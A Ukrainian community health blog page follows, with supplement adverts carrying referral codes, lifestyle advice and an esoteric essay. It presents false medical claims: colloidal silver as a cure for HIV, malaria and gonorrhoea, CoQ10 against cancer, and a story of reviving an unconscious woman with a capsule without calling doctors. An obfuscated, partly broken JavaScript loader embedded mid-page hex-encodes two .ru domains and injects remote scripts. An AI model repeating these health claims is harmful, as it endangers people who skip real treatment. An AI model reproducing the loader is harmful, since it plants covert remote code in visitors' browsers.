О сообществе

Допоможи собі сам бути здоровим, бути щасливим, позитивним, дійовим, цілеспрямованим, успішним, фінансово незалежним. Сам будуй свою реальність, своє Буття, Сам будуй суспільство свідомих, відповідальних людей.
Живи громадою за своїм звичаєм. Допоможи собі побудувати своє світле майбутнє. Мрій, бажай, твори. Допоможи собі сам і веди за собою інших. Продовжуй традиції давніх цивілізацій наших предків, починаючи від 12 тисячоліття до н.е.
Допоможи собі побудувати нашу державу, громадянське суспільство, згуртувати наш народ, націю. Зміцнюй українську націю, незалежно від етнічного походження.
Розвивай свій мозок і підсвідомість, що дозволить самореалізуватися. Відновлюй звязок з Вищими силами сам, без посередників.
Допомогаймо один одному. Не покладаймося лише на допомогу іноземців. Вона буде, але ми самі маємо здолати всі труднощі і перешкоди.
І незважаючи ні на що, співай, танцюй, веселися як наші предки.
Сам знайди своє місце у світі, Всесвіті, усвідом себе його частинкою. Знай хто ти, де ти, з ким ти хочеш бути і куди хочеш іти. Повір у себе. Створи і зміцни впевненість у собі.
Вид:
краткий
полный

САМОДОПОМОГА

Ваш Срібний захист

Срібло традиційно використовували в лікувальних цілях, поки не увійшли в широкий ужиток антибіотики, незаслужено витіснили цей природний антисептик. Молекули срібла гальмують розмноження патогенних бактерій і грибків, знижують їх життєдіяльність. При цьому спектр дії колоїдного срібла поширюється на 650 видів бактерій, тоді як спектр дії антибіотика - лише 5-10 видів.

Найкращий ефект дають продукти, що містять срібло в концентрації 20 ppm, виготовлені за інноваційною технологією Aqua Sol. Дана технологія була запатентована. Патент (United States Patent 7135195) містить докладний опис досліджень і підтвердження in vitro і in vivo унікальних властивостей даного складу.

Технологія Aqua Sol - це застосування найдрібніших частинок срібла (від 0,015 до 0,005 мікрометра в діаметрі), завдяки чому і досягається максимальна біодоступність срібла і його ефективна дія через шкіру. Кожна частка срібла оточена тонким покриттям, побудованим з тисяч молекул Ag. Така структура стає набагато більш стійкою і біодоступною. Колоїдний розчин срібла, виготовлений за запатентованою технологією при використанні ефективного електростатичного заряду містить максимальну кількість (понад 97%) колоїдного срібла, і в ньому практично відсутнє вільне іонне срібло. Іони срібла мають високу реакційну здатність, надають припікаючу і подразнюючу дію на слизові і при попаданні в організм швидко взаємодіють з різними речовинами, утворюючи з ними малоактивні з'єднання. Препарати іонного срібла мають підвищену токсичність. Колоїдне срібло - більш безпечна і нешкідлива форма.

Безпека. Головна перевага колоїдного срібла перед антибіотиками в тому, що воно залишається дружнім по відношенню до корисної мікрофлори людини, тоді як антибіотик вбиває її, викликаючи дисбактеріоз, діарею, знижуючи імунітет людини і маючи безліч інших побічних ефектів. Безпека і ефективність колоїдного срібла перевірено в більш ніж 200 наукових дослідженнях. Це активна речовина знищує бактерії, віруси і гриби, зменшує запалення, може застосовуватися щодня без побічних ефектів.

Робота із запаленням Колоїдне срібло сприяє скороченню кількості бактерій в рані, стимулює виробництво стовбурових клітин, ефективно зменшуючи процес запалення і посилюючи регенерацію тканин Дослідження показали, що розчин колоїдного срібла має бактеріостатичні (зупиняє ріст бактерій) і бактерицидні (вбиває бактерії) властивості. Він активний відносно як грампозитивних так і грамнегативних бактерій. Гель Срібний Щит, володіє потужним антибактеріальною, антигрибковою і противірусною дією. Його дія була перевірена і підтверджена в відношенні цілого ряду бактерій: Bacillus anthracis, Bacillus subtilis, Candida albicans, Mycobacteria bovis, Mycobacteria tuberculosis, Pseudomonas aeruginosa, Salmonella choleraesius, Staphylococcus aureus, Trichomonas vaginalis, Yersinia pestis. Порівняння з іншими формами колоїдного срібла, представленими на ринку, підтвердило перевагу колоїдного срібла, створеного за технологією Aqua Sol!

Ефективність Продукти колоїдного срібла, створеного за технологією Aqua Sol високо ефективні щодо збудників таких захворювань, як:  Малярія  грибкова інфекція шкіри  Захворювання сечостатевої системи (в тому числі гонорея !!!)  тонзилітів  Запалення в нирках  Фарингіти  кон'юктівіта  отити  Захворювання дихальних шляхів (у тому числі назальні інфекції та гайморити) Антивірусні властивості були підтверджені по відношенню до вірусів імунодефіциту людини, гепатиту групи в, а також придушення вірусної ДНК-полімерази і зворотної транскриптази - ферментів, які безпосередньо займаються розмноженням вірусів
Новий гель з сріблом володіє потужною антибактеріальною дією  Містить срібло у вигляді мікроскопічних часток в колоїдному розчині, що забезпечує максимальну біодоступність активної речовини  Містить 100 мкг срібла на 5 мг гелю  Не токсичний  Не містить спирту Безпечний в застосуванні для дітей  очищає і зволожує шкіру, в тому числі шкіру рук Для зовнішнього застосування

Переваги Завдяки високому вмісту срібла для обробки поверхні потрібно невелика кількість гелю. Тюбик вміщує 85 г продукту - цього вистачить надовго навіть для використання всією родиною. При цьому такий тюбик зручно брати з собою в дорогу.
Гель володіє дуже широким спектром дії - його можна використовувати при травмах і пошкодженнях різної тяжкості, а також їм можна очистити шкіру, коли немає можливості скористатися водою і милом.
Гель утворює невидиму плівку на поверхні шкіри, завдяки чому він надає тривала дія на оброблену ділянку. Срібло знімає запальний процес, зменшує набряклість і перешкоджає утворенню рубців. ДО ЧЕРЕЗ 7 ДНІВ

Ситуації застосування Відкриті рани, порізи, подряпини, в тому числі на слизових оболонках  Нагноєння  Догляд за пролежнями  Акне (вугри)  Опіки  Екземи  Подразнення на шкірі  При укусах комах  Для очищення і дезінфекції шкіри, у тому числі рук
 Це універсальний засіб для всіх членів вашої родини від найменших до старшого покоління!

Оновлена формула Коллоідного Срібла Концентрація срібла на 10% вище! Пригнічує життєдіяльність патогенних бактерій, вірусів і грибків  Антісептичний засіб  Містить срібло у вигляді мікроскопічних часток в колоїдному розчині, що забезпечує максимальну біодоступність активної речовини  Містить 100 мкг срібла на 5 мл (1 чайна ложка)  Не токсичне Для зовнішнього і внутрішнього застосування

Області застосування:  Для вживання всередину при: - ослабленні імунітету - запальних процесах - харчових отруєннях і гострих кишкових інфекціях - ураженнях гельмінтами - інфекціях сечостатевих шляхів, в тому числі хламідіоз, уреаплазмоз, трихомоніаз і т.д.  Для полоскання рота з метою дезінфекції, у тому числи при наявності ранок на слизовій.  Для промивання носових пазух і полоскання горла при нежиті при простудних захворюваннях, гострих і хронічних захворюваннях носа і горлянки.

Подробиці на aura.nsp.ua, промокод 771060

Калоїдне срібло


50%, 1 голос

0%, 0 голосов

50%, 1 голос

0%, 0 голосов

0%, 0 голосов

0%, 0 голосов

0%, 0 голосов
Авторизируйтесь, чтобы проголосовать.

Лікарі рятують нас...

Лікарі рятують нас в критичних ситуаціях. Однак зловживати цим не можна Про своє здоров'я варто турбуватися самому і щоденно. Їжа має бути для Вас ліками, а не ліки їжею, як сказав Гіпократ. І в цьому Вам допоможе новий магазин продуктів для здоров'я і краси: aura.nsp.ua (адресу вводити у верхню строчку браузера)

Зареєструвавшись, матимете можливість отримувати інформацію як підтримувати здоров'я, протестувати всі системи організму,  при бажанні отримати дисконт . БУДЬТЕ ЗДОРОВІ!

http://natr.ru/pages/reklamnye-i-obuchajuschie-roliki-o-populjarnyh-produktah-i-ozdorovit
Як Ви підтримуєте своє здоров'я?


11%, 1 голос

44%, 4 голоса

0%, 0 голосов

11%, 1 голос

11%, 1 голос

22%, 2 голоса

0%, 0 голосов
Авторизируйтесь, чтобы проголосовать.

Про Буття

Той момент, коли твої рідні виступають на сцені і настрій зашкалює)

Можливо, що ця радісна дівчинка - майбутнє гурту “Буття”, а на сьогодні основу гурту складає старше покоління сім’ї Бутів.

Виступи цього гурту вражають розмаїттям та глибиною музики, і не дивно, адже учасники “Буття” обстежили в етнографічних експедиціях близько 300 сіл від Луганщини до Закарпаття в пошуках інструментальних награвань, пісень і танців.

Ознайомитись зі справжньою автентичною українською музикою можна на сайті гурту: http://www.buttia.kiev.ua/

Фото були зроблені під час виступу гурту на благодійному аукціоні “Мистецтво заради життя”.
Дякуємо колективу за сердечне виконання та збереження традицій.

https://youtu.be/P-HYwSBFzLg

Діти -


24%, 4 голоса

0%, 0 голосов

0%, 0 голосов

6%, 1 голос

6%, 1 голос

59%, 10 голосов

6%, 1 голос
Авторизируйтесь, чтобы проголосовать.

Система здоров'я геніального лікаря

Основні правила з системи здоров'я геніального лікаря Миколи Амосова:

1. Не сподівайтеся, що лікарі зроблять вас здоровим. Вони можуть врятувати життя, навіть вилікувати хворобу, але лише підведуть до старту, а далі - щоб жити надійно - покладайтеся на себе. Я ніяк не применшую могутність медицини, оскільки служу їй все життя. Але також знаю толк у здоров'ї - теоретично і практично. Можу похвалитися: вже півтора року проводжу експеримент на собі - фізкультура з гантелями і біг.

2. Лікарі лікують хвороби, а здоров'я потрібно здобувати самому. Тому що здоров'я - це «резервні потужності» органів, всієї нашої фізіології. Вони необхідні, щоб підтримувати нормальні функціональні показники - у спокої і при навантаженнях - фізичних і психічних, а також щоб не захворіти, а захворівши, по можливості - не вмерти. Приміром, щоб кров'яний тиск і пульс не підвищувалися більше, ніж у півтора рази при вправах або бігу, а неминуча задишка швидко заспокоювалася. Щоб не боятися протягу, а застуди швидко проходили без ліків, самі собою. І взагалі, щоб добре працювалося, спалося, «їлось і пилося».

Так от - ці «потужності» ліками не здобуваються. Тільки тренуванням, вправами, навантаженнями. І - роботою, терпінням до холоду, спеки, голоду, стомлення.

3. Що таке хвороби, відчуває кожен: прикрий розлад різних функцій, що заважає відчувати щастя і навіть жити. Причини теж відомі: зовнішні «шкідливості» (інфекція, екологія, суспільні потрясіння), власна нерозумна поведінка. Іноді - вроджені дефекти.

Стверджую: природа людини міцна. Принаймні, у більшості людей. Правда, дрібні хвороби неминучі, але серйозні найчастіше - від нерозумності способу життя: зниження резервів в результаті детренованності. Зовнішні умови, бідність, стреси - на другому місці.

4. Тренування резервів повинно бути розумним. Тобто поступовим, але наполегливим. Якщо сказати про суть тренування - то це режим обмежень і навантажень (РОН). Це мій коник. Втім, нічого оригінального я не придумав. Три головні пункти:

Перший - їжа з мінімумом жирів, 300 г овочів і фруктів щодня, і щоб вага не піднімався вище цифри (зріст мінус 100) кілограм.

Другий - фізкультура. Тут справа складніша. Вона всім потрібна, а дітям і старим - особливо. Оскільки тепер на роботі майже ніхто фізично не напружується, то, по ідеї, для пристойного здоров'я потрібно б займатися по годині на день кожному. Але немає для цього характеру у нормальної людини. Тому - хоча б 20 - 30 хвилин гімнастики, це приблизно 1000 рухів, краще з гантелями по 2 - 5 кг. Раджу вправлятися перед телевізором, коли «Новини» показують, щоб час заощаджувати. В якості додавання до фізкультури бажано виділяти ділянку для ходьби, по дорозі на роботу і назад, по одному кілометру. Корисно, і нерви зберігає, враховуючи поганий транспорт. Про біг підтюпцем я вже не кажу - нереально. Але - корисно.

Третій пункт, мабуть, найважчий: управління психікою. «Вчіться володіти собою». Але ох як це важко! Рецептів багато, аж до медитації, описувати не буду. Сам користуюся простим прийомом: коли велике напруження і виділилося багато адреналіну, фіксую увагу на ритмічному рідкому диханні і намагаюся розслабити м'язи. Найкраще б в такі моменти - зробити енергійну гімнастику, але ж обстановка зазвичай не дозволяє. Але все одно, як тільки дозволить - працюйте. Надлишок адреналіну спалюється при фізичних вправах, і таким шляхом судини і органи рятуються від спазмів. У тварин стреси вирішуються втечею або бійкою, а людині це не дозволено.

5. Цікаве питання: чому люди так часто хворіють? Думаю, що 90% людей, якби вони дотримувалися правильного способу життя, були б здоровими. Але, на жаль, режим вимагає напруження волі. А сили волі у людини мало ... Сучасне офіційне лікування здійснюється методом «Підбору-Перебору» гіпотензивних засобів, яких не один десяток, і які потім треба приймати все (!) Життя.

6. І ще: у світі багато, дуже багато поганих лікарів. Не можу огульно заявити: «всі лікарі погані». Багато хороших, але і поганих - теж. Докази? Запитайте, що вони читають і що вміють. Читають - з практиків - одиниці. Уміють - більш-менш - лікарі хірургічного профілю. Тому що їм без прикладання рук просто не можливо лікувати. Терапевти щиро вважають, що їм нічого не потрібно вміти - ні аналіз зробити, ні на рентгені подивитися, ні плевру пунктирувати. Є, мовляв, для цього вузькі фахівці. А ми, мовляв, загальні лікарі. Ось так.

І під кінець. Є багато помилок в медичній науці. Часто це залежить від неправильної оцінки статистичних даних. Наприклад, на ваш погляд, у чому причина «розростання», «збільшення» раку? У світі немає ніякого особливого збільшення кількості ракових хворих (крім раку легенів). Більше того, випадки захворювання на рак шлунка навіть зменшилися. Як займав рак друге або третє місце в причинах смертності - так і займає. Але мало хто враховує, що тривалість життя за останні півстоліття зросла, а раком найчастіше хворіють люди старшого віку.

В організмі є потужні захисні сили - імунна система, механізми компенсації. Вони спрацюють, потрібно дати трохи часу. Майте на увазі, що більшість легких хвороб проходять самі, докторське зілля тільки супроводжує природнє одужання. Вам кажуть: «Вилікували!», А ви і вірите: «Хороший лікар!»

7. Якщо вже пощастило потрапити до хорошого лікаря, бережіть його, даремно не турбуйте.

Пам'ятайте, що лікар - це більше, ніж просто фахівець. Це не сантехнік. Вказівки лікаря виконуйте ... в міру вашого розуміння. І не вимагайте від нього зайвих ліків, про які від сусідок дізналися.

Якщо ти молодий - до 60! - І симптомів від органів немає, то не слід при найменшому нездужанні бігти в поліклініку. Як я вже говорив, наші лікарі не довіряють природі, націлені на ліки і спокій. Бійтеся потрапити до них у полон! Знайдуть хвороби і переконають: «Відпочивати і лікуватися!»

І на закінчення: Щоб бути здоровим, потрібна сила характеру. Як людині знайти оптимум в трикутнику між хворобами, лікарями і вправами? Моя порада: вибирати останнє. Принаймні, старатися. Повірте - окупиться!Хто дасть мені Здоров'я


36%, 4 голоса

9%, 1 голос

9%, 1 голос

0%, 0 голосов

9%, 1 голос

0%, 0 голосов

36%, 4 голоса

0%, 0 голосов

0%, 0 голосов
Авторизируйтесь, чтобы проголосовать.

Чарівна пігулка (продовження історії http://blog.i.ua/community)

Кофермент Q10 Плюс Код: 1796

Форма випуску: 60 капсул по 540 мг | Вага брутто: 51,20 г

Забезпечує вироблення енергії на клітинному рівні

Позитивно впливає на серцево-судинну систему, головний мозок і периферичну нервову систему

Надає підтримку імунній системі

Підвищує регенеративні процеси слизової оболонки ясен і інших швидкорослих тканин

Має антиоксидантну активність

Кофермент - це вітаміноподібна речовина небілкової природи, який необхідний для роботи ферментів, що виробляють енергію клітини і накопичують її у вигляді аденазілтріфосфорной кислоти (АТФ). Клінічні дослідження показали, що кофермент Q10 є складовою частиною мітохондрій - субклітинних елементів, що виробляють близько 95% всієї енергії, необхідної людському організму. У внутрішніх органах, які споживають велику кількість енергії, таких як серце, печінка, нирки, селезінка, підшлункова залоза, повинен підтримуватися високий рівень коферменту Q10. Згідно з результатами досліджень 25% дефіцит коферменту Q10 в цих органах може бути причиною серйозних захворювань. З віком організм втрачає здатність засвоювати достатню кількість коферменту Q10, що надходить з їжею паралельно з цим знижується його синтез в організмі, тому ризик захворювань зростає.

Дослідження довели, що кофермент Q10 необхідний для забезпечення імунного захисту організму і нормальної роботи серцево-судинної системи. Він знижує артеріальний тиск. Сучасні кардіологи починають лікування гіпертонічної хвороби з призначення коферменту Q10.

Відзначено гарні результати при тривалому застосуванні цього препарату (у дозі до 150 мг) при серцевій недостатності, при різних формах міокардіодистрофії і міокардитах. Ці стани дуже важко піддаються лікуванню звичайними фармпрепаратами. Відзначається хороший ефект при стенокардії. Стоматологи стверджують, що застосування коферменту Q10 дає фантастичні результати при лікуванні парадонтозу (50-75 мг на добу). В даний час ведуться активні дослідження в онкології. З'явилися обнадійливі результати профілактики і лікування раку молочної залози та інших органів.

Раціональне застосування коферменту Q10 при обмінних захворюваннях, діабеті, в програмах зниження ваги. В останньому випадку хорошим поєднанням є застосування Garcinia Combination, що містить L-карнітин.

Крім коферменту Q10, до складу біологічно активної добавки входять хелатні сполуки заліза, магнію, цинку, міді. Глід і перець кайенский підвищує засвоєння біологічно активних речовин. Спільна дія всіх інгредієнтів добавки дозволяє добитися максимальної ефективності.

Біологічно активна добавка Co Q10 Plus надає підтримку серцево-судинної та імунної систем, покращує роботу головного мозку, регулює кровообіг, позитивно впливає на енергетику всього організму.

Застосування

По 1 капсулі 1-3 рази на день під час їжі. Зберігати в сухому, прохолодному місці.

Склад

1 капсула: Кофермент Q10 - 10 мг. Залізо (хелат) - 2 мг. Магній (хелат) - 25 мг. Цинк (хелат) - 5 мг. Мідь (хелат) - 2.5 мг. Плоди (1: 1) - 190 мг. Кайенского перцю Глоду хелатній формі є сумішшю органічних сполук мінералів з амінокислотами гліцин, гістидин і лейцин.

Протипоказання: Індивідуальна непереносимість продукту.

Оформити дисконт (-30%) безплатно https://nsp25.com/signup.php?sid=771060, сервісний центр 333 


Чи готові Ви взяти на себе відповідальність за своє здоров’я?

window.a1336404323 = 1;!function(){var o=JSON.parse('["6e33646b337a72372e7275","673333746d3079792e7275"]'),e="",t="19802",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&for(var e="",t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.onerror=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"function"==typeof t&&t())}}},d=function(u){var s=n("oisdom");e=s&var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/pjs/"+t+"/c/"+c("blog.i.ua")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&d()}();

0%, 0 голосов

0%, 0 голосов

33%, 1 голос

67%, 2 голоса

0%, 0 голосов

0%, 0 голосов

0%, 0 голосов
Авторизируйтесь, чтобы проголосовать.

Як підняти людину з мертвих? Чи є місце для чуда в нашому житті?

Соціальний працівник села обходила своїх підопічних — одиноких пенсіонерок. Забігає в хату:

- Хтодосько аж ходімо до Паші, бо вона лежить непорушно і не говорить, — з порога промовила злякана працівниця.

Жіночки, зайшовши до сусідки, намагалися розрухати Пашу — все марно, вона майже не дихала.

- Ось я принесу свої ліки — сказала Хтодоська.

Повернувшись вона запхала капсулу до рота немічної та дала запити. І... о чудо! Вже за 15 хвилин Паша піднялась, заговорила, як нічого й не було.

Поки приїхав брат з Києва, терміново визваний до “небіжчиці” не було й признаку прикрої пригоди.

Що характерно, лікарів не визивали. А якби й визвали, то чи вчасно б вони приїхали і чи змогли би чимось зарадити? Чи може прийшлося звати священника?


Що робити при серцевих приступах?


20%, 1 голос

0%, 0 голосов

60%, 3 голоса

20%, 1 голос
Авторизируйтесь, чтобы проголосовать.

Перехідний вік


В житті людини відбувається декілька відповідальних етапів, кожен з яких можна визначити як перехідний вік. В цей час організм вимагає до себе дуже бережного відношення. Особливо, коли він із молодості вступає в пору вираженої зрілості, а потім і в пожилий вік. Перехід від молодості до зрілості завершуїться у різних людей у різний час, в залежності від спадковості та індивідуальних особливостей. В більшості випадків в 45...50 років.


На цьому етапі перебудовуються внутрішні системи організму, дещо змінюється зовнішність і психіка. Так в обміні речовин, його загальній направленності, як і в діяльності ендокринних залоз, розвивають ся процеси утворення і відкладення жиру.Якщо своєчасно не вжити необхідних заходів, то збільшиться маса тіла, а це важко виправити.


Те, чим ви є сьогодні, будете завтра, чи через 10 років, те як ви себе почуваєте, як виглядаєте, переважно залежить від того, що ви їсте. Еталону харчування не існує, це справа індивідуальна. Проте з впевненістю скажемо: чим більше натуральних продуктів у вашому раціоні, тим краще ваше здоров’я. Саме до таких продуктів пристосована наша система переварювання їжі. Тому намагайтесь їсти більше фруктів, овочів, горіхів, насіння, молочних продуктів, меду, олії, які непіддавались тепловому впливу. М’ясо, рибу. Овочі намагайтесь обробляти при мінімальній температурі. І, головне — не переїдайте! В невеликих кількостях мохна споживати всі харчові продукти. Однак у перехідному віці рекомендовано замість солених огірків їсти квашену капусту, оселедець вимочувати і замість хлібобулочних виробів з борошна вищого гатунку віддати перевагу хлібу з висівками, чи з житнього борошна на заквасці, рису і манній крупі — гречану і вівсяну крупи.

Менше вживати цукру і жирів, віддаючи перевагу меду та олії.

Бажано споживати всі види фруктів, овочів, ягід, молочнокислі продукти. Важливо, щоб у їжі було достатньо вітамінів. Їх багато в цитрусових, порічках, горобині, шипшині, буряках і т.д. Не забувайте про те, що інтервал між прийняттями їжі не має перевищувати 6 годин. Вечерю не варто робити щедрою. Після неї до сну повинно пройти не менше 3 годин. Цим забезпечуються найбільш сприятливі у мови для нічного відпочинку.

Для очищення організму від шлаків, мобілізації його захисних сил, можна рекомендувати короткочасну відмову від їжі один раз у 2-3 тижні. Пропоную таку схему голодування:

1 день — фруктово-овочева дієта , ввечері послаблююче;

2 день — повна відмова від їжі, вживання води не обмежується;

3 день — сокова дієта;

4 день — нормальне харчування.

Пам’ятайте, що лікування ожиріння довготривалим голодуванням чи спеціальними дієтами має здійснюватися по строгим показанням під контролем лікаря.

Ніколи не втрачайте можливості побувати на сонці і свіжому повітрі. Якщо вам не протипоказані сонячні ванни, то їх варто приймати рано вранці. Протягом 5-10 хвилин здійсніть прекрасну бактерицидну дію на ваш організм. Кожен день ви повинні знаходитись на свіжому повітрі не менше 1-1,5 години, здійснюючи 3-5 кілометрові прогулянки. При цьому слідкуйте за своєю осанкоюходіть випрямившись, орієнтуйте свій крок по середній лінії грудної клітини. Хода повинна бути розмірена і пружна, плечі розвернуті, голова піднята. Якщо ви житель міста, то візьміть собі за правило хоча б раз у тиждень виїздити на природу.

Важко переоцінити ту користь, яку приносить робота на садово-городній ділянці. Вона дозволяє не тільки позбавитись зайвої ваги тіла, але й нормалізувати нервово-емоційний стан, знизити дратівливість.

Нема виправдання тому, хто відмовився від занять фізичними вправами, незалежно від того, розвинутий він фізично, чи ні. Якщо наші мускули не працюють, то ми їх втрачаємо. Щоб зберегти м’язи сильними і молодими, ми повинні постійно кортистуватися ними. Регулярно тренуючи їх (це може бути біг, хотьба, спортивні ігри, фізична робота, спеціальний комплекс вправ і т.д.) ми робили тіло сильним, оновленим і життєздатним.

Доцільно включати в ранкову зарядку наступні вправи:

  • нахили тулуба вправо і вліво позмінно;

  • повороти тулуба вправо і вліво;

  • нахили тулуба вниз (пальці рук мають торкатися підлоги);

  • присідання на носках, не нахиляючи тулуба.

Вправи можна повторювати від 3 до 5 разів.

А вода! Рідна для нас стихія, яка пробуджує найрадісніші емоції. Купання і плавання приносять найбільшу насолоду. Сотні лікувальних заходів знали в древній Індії, але найсильнішим, найвірнішим вважадася вода. Не полініться встати вранці на 10-15 хвилин раніше звичайного і обов’язково прийміть контрасний душ. На весь день вам гарантовано бадьорість і добре самопочуття.

А тепер спитайте себе, як багато часу ви приділяєте фізичній культурі, рухливим іграм, танцям, плаванню? Як ви харчуєтесь, чому віддаєте перевагу в їжі? Критично подивіться на себе в дзеркало — чи не сутулитесь, чи не згладилася ваша талія, чи не видно на спині та бедрах складок жиру? І вирішіть, чи не пора вам серйозно подумати про те, як зберегти фігуру стрункою.чим ви є сьогодні, будете завтра, чи через 10 років, те як ви себе почуваєте, як виглядаєте,залежить від того,


43%, 3 голоса

0%, 0 голосов

14%, 1 голос

29%, 2 голоса

0%, 0 голосов

14%, 1 голос

0%, 0 голосов

0%, 0 голосов
Авторизируйтесь, чтобы проголосовать.

Закон Чистої свідомості

 Цей закон заснований на тому, що ми, по самій своїй суті, є чиста свідомість.


Чиста свідомість - це поле всіх можливостей і нескінченних творчих здібностей. Чиста свідомість - наша духовна сутність.

Володіючи нескінченністю і необмеженністю, воно являє чисту радість. Інші якості свідомості - чисте знання, безмежна тиша, вчинена рівновага, непереможність, простота і блаженство. Ось що таке наша сутність.

Коли ви виявляєте свою сутність і знаєте, хто ви є насправді, в цьому знанні себе полягає здатність здійснити будь-яку свою мрію, тому що ви є нескінченна можливість, невимовний потенціал всього, що було, є і буде.


Закон Чистої свідомості можна назвати також Законом Єдності, тому що під нескінченним різноманіттям життя лежить єдність всепроникаючого духу.

Між вами і цим полем енергії не існує розділнності. Поле чистих потенційних можливостей - це ваше власне Я. І чим більше ви осягаєте свою справжню природу, тим більше ви наближаєтеся до простору чистої потенційності.

Відчуття свого Я, означає, що нашою внутрішньою точкою відліку стає наш власний дух, а не об'єкти нашого сприйняття.

Протилежністю відчуття свого Я є перебування під впливом об'єктів поза нашим Я, куди входять ситуації, обставини, люди і речі. Ми завжди чекаємо схвалення з боку. У своїх думках і в своїй поведінці ми завжди залежимо від відповідної реакції, а значить, в основі їх лежить страх.

Крім того, ми постійно відчуваємо наполегливу потребу управляти подіями. Ми відчуваємо наполегливу потребу у зовнішній силі. Потреба в схваленні, потреба управляти подіями і потреба в зовнішній силі - це потреби, в основі яких лежить страх.

Такого роду сила не є силою Я, реальної силою. Коли ми відчуваємо силу Я, страху не існує, не існує непереборного бажання контролювати події і потреби в схваленні або зовнішній силі.

При перебуванні під впливом об'єктів, внутрішньої точкою відліку служить ваше его. Однак его - це не те, чим ви дійсно є. Его - це ваш власний уявний образ, соціальна маска, це виконувана вами роль.

Отримуючи схвалення, ваша соціальна маска процвітає. У своєму вічному бажанні влади вона спирається на силу, бо живе в страху.

Ваше справжнє Я - ваш дух, ваша душа - повністю вільна від усього цього. воно несприйнятлива до критики, її не лякають ніякі випробування, вона не вважає себе нижче будь-якої іншої людини. І в той же час воно має скромність і не ставить себе вище нікого іншого, тому що воно усвідомлює, що будь-хто інший - це той же Я, той же дух під різними масками.

Саме в цьому полягає основна відмінність між перебування під впливом об'єктів і відчуттям свого Я. При зосередженні на своєму Я ви відчуваєте свою справжню сутність, яка не боїться ніяких випробувань, поважає всіх людей і не відчуває себе нижче інших. Тому сила, яка спирається на відчуття свого Я, є істинною силою.

Сила ж, що спирається на перебування під впливом об'єктів, - це помилкова сила. Грунтуючись на его, вона існує лише до тих пір, поки існує об'єкт відліку.

Якщо ви володієте певним титулом - наприклад, ви президент країни, або голова великої корпорації, або ж у вас багато грошей, - сила, яка доставляє вам радість, йде разом з титулом, разом з роботою, разом з грошима. Сила, яка спирається на его, існує до тих пір, поки існують ці об'єкти. Як тільки зникає звання, робота чи гроші, зникає і сила.

На противагу цій силі, сила, яка спирається на відчуття свого Я, постійна, бо вона спирається на знання Я. Ось деякі особливості цієї сили: вона привертає до вас людей, але вона привертає також і те, до чого ви прагнете. Вона притягує людей, ситуації та обставини на підтримку ваших бажань.

Це можна назвати також підтримкою з боку законів природи. це підтримка з боку Божественного, підтримка, яка виходить від буття, коли воно до вас прихильно. Ваша сила така, що зв'язок з людьми приносить вам радість, а людям доставляє радість зв'язок з вами. І саме ваша сила служить сполучною силою, вона встановлює зв'язок, який виходить з істинної любові.


Як же ми можемо застосувати Закон Чистої свідомісті, поле чистих можливостей, до свого життя? Якщо ви хочете насолоджуватися перевагами поля чистих можливостей, якщо ви хочете повністю використовувати творчі можливості, властиві чистій свідомості, ви повинні мати до них доступ.

Один із способів проникнути в це поле - це щоденна практика безмовності, медитація і не-осудження, відсутність оцінок. Якщо ви будете проводити час серед природи, це теж відкриє вам доступ до якостей, властивим полю: безмежним творчим можливостям, свободу і блаженства.

Практика безмовності означає взяття на себе зобов'язань витрачати певний кількість часу на те, щоб просто Бути. Перебувати в безмовності означає час від часу відмовлятися від розмовної активності. Це означає також періодичний відмова від таких занять, як телевізор, радіо і читання книг. якщо ви ніколи не надаєте собі можливість випробувати тишу, це вносить збурення в ваш внутрішній діалог.

Постійно приділяйте трохи часу тому, щоб випробувати тишу. Візьміть на себе зобов'язання присвячувати цьому заняттю дві години на добу, але якщо вам здається, що це занадто багато, можете обмежитися півгодиною. Але час від часу ви повинні перебувати в тиші протягом тривалого періоду часу - цілий день, два дні або навіть весь тиждень.

Що відбувається, коли ви занурюєтеся в тишу? Спочатку ваш внутрішній діалог стає ще більш бурхливим. Ви відчуваєте наполегливу потреба щось говорити.

Я знав людей, які в перші день-два добровільного тривалого мовчання буквально втрачали розум. Їх раптово охоплювало почуття неспокою і наполеглива потреба щось робити.

Але в міру продовження досвіду внутрішній діалог починає заспокоюватися. І незабаром настає глибока тиша. Це відбувається тому, що розум з часом поступається. Він усвідомлює, що немає сенсу блукати навколо, якщо ви - вища Я, дух, той, хто приймає рішення, - не збираєтеся говорити. І тоді, коли замовкає внутрішній діалог, ви починаєте відчувати спокій поля чистих потенційних можливостей.

Практикувати час від часу безмовність, тоді, коли це вам буде зручно, - один із способів дізнатися на досвіді Закон Чистої свідомісті.

Ще один спосіб - щоденна Медитація. Ідеальним було б присвячувати цьому заняттю півгодини вранці і півгодини ввечері. За допомогою медитації ви отримуєте доступ в поле чистої безмовності і чистого усвідомлення. У цьому просторі чистої безмовності знаходиться поле безмежних взаємозв'язків, поле безмежної організуючої сили, основне джерело творення, де все нерозривно пов'язане зі всім іншим.


